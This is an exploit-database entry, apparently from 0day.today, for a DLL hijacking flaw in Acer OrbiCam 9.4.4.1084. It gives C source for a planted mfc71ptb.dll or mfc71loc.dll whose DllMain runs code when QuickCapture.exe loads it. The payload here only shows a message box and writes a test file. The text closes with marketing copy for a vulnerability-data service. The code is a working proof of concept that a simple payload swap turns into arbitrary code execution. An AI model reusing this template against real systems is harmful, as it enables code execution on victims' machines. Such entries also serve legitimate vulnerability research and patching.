=================================================
Acer OrbiCam DLL Hijacking Exploit (mfc71ptb.dll)
=================================================
/*
*
* Acer OrbiCam 9.4.4.1084 DLL Hijacking Exploit (mfc71ptb.dll and mfc71loc.dll)
*
* Author: Inj3cti0n P4ck3t
*
* Contact e-mail: [email protected]
*
* Operating System: Windows XP (Version 5.1 Service Pack 3)
*
* Name Application: QuickCapture.exe
*
* Software Acer Orbicam 9.4.4.1084
*
* Name DLL: mfc71ptb.dll and mfc71loc.dll
*
* Greetz: Inj3ct0r.com (Inj3ct0r Exploit DataBase) and fvox - HADES - M4V3RiCk - T4ph0d4 - DD3str0y3r - C00l3r - Archit3ct - Red Eye Crew
*
*
*/
#include <windows.h>
#include <stdio.h>
int teste()
{
MessageBox(0, "Test", "and Test", MB_OK);
FILE *fp;
fp = fopen("teste.txt", "w");
fwrite("it works ;-)", 1, 12, fp);
fclose(fp);
exit(1);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
teste();
return TRUE;
}
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation